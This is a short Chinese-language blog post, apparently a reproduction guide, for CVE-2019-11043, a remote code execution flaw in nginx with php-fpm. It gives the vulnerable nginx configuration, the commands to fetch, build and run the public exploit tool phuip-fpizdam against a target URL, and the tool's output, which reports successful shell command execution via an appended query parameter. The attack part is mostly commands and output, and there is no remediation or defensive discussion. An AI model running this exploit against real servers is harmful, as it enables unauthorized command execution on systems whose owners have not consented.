CVE-2019-11043 nginx+php-fpm RCE

# CVE-2019-11043 nginx+php-fpm RCE

漏洞环境:
如果网络服务器运行nginx + php-fpm,并且nginx具有类似的配置
“`
location ~ [^/]\.php(/|$) {

fastcgi_split_path_info ^(.+?\.php)(/.*)$;
fastcgi_param PATH_INFO $fastcgi_path_info;
fastcgi_pass php:9000;

}
“`
Exp工具准备:
“`
go install github.com/neex/phuip-fpizdam
phuip-fpizdam [url]
或者
git clone https://github.com/neex/phuip-fpizdam
go build
phuip-fpizdam [url]
“`
输出:
“`
Base status code is 200
Status code 500 for qsl=1745, adding as a candidate
The target is probably vulnerable. Possible QSLs: [1735 1740 1745]
Attack params found: –qsl 1735 –pisos 126 –skip-detect
Trying to set “session.auto_start=0″…
Detect() returned attack params: –qsl 1735 –pisos 126 –skip-detect <-- REMEMBER THIS Performing attack using php.ini settings... Success! Was able to execute a command by appending "?a=/bin/sh+-c+'which+which'&" to URLs Trying to cleanup /tmp/a... Done! ``` 代码执行: ``` ?a=
“`

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容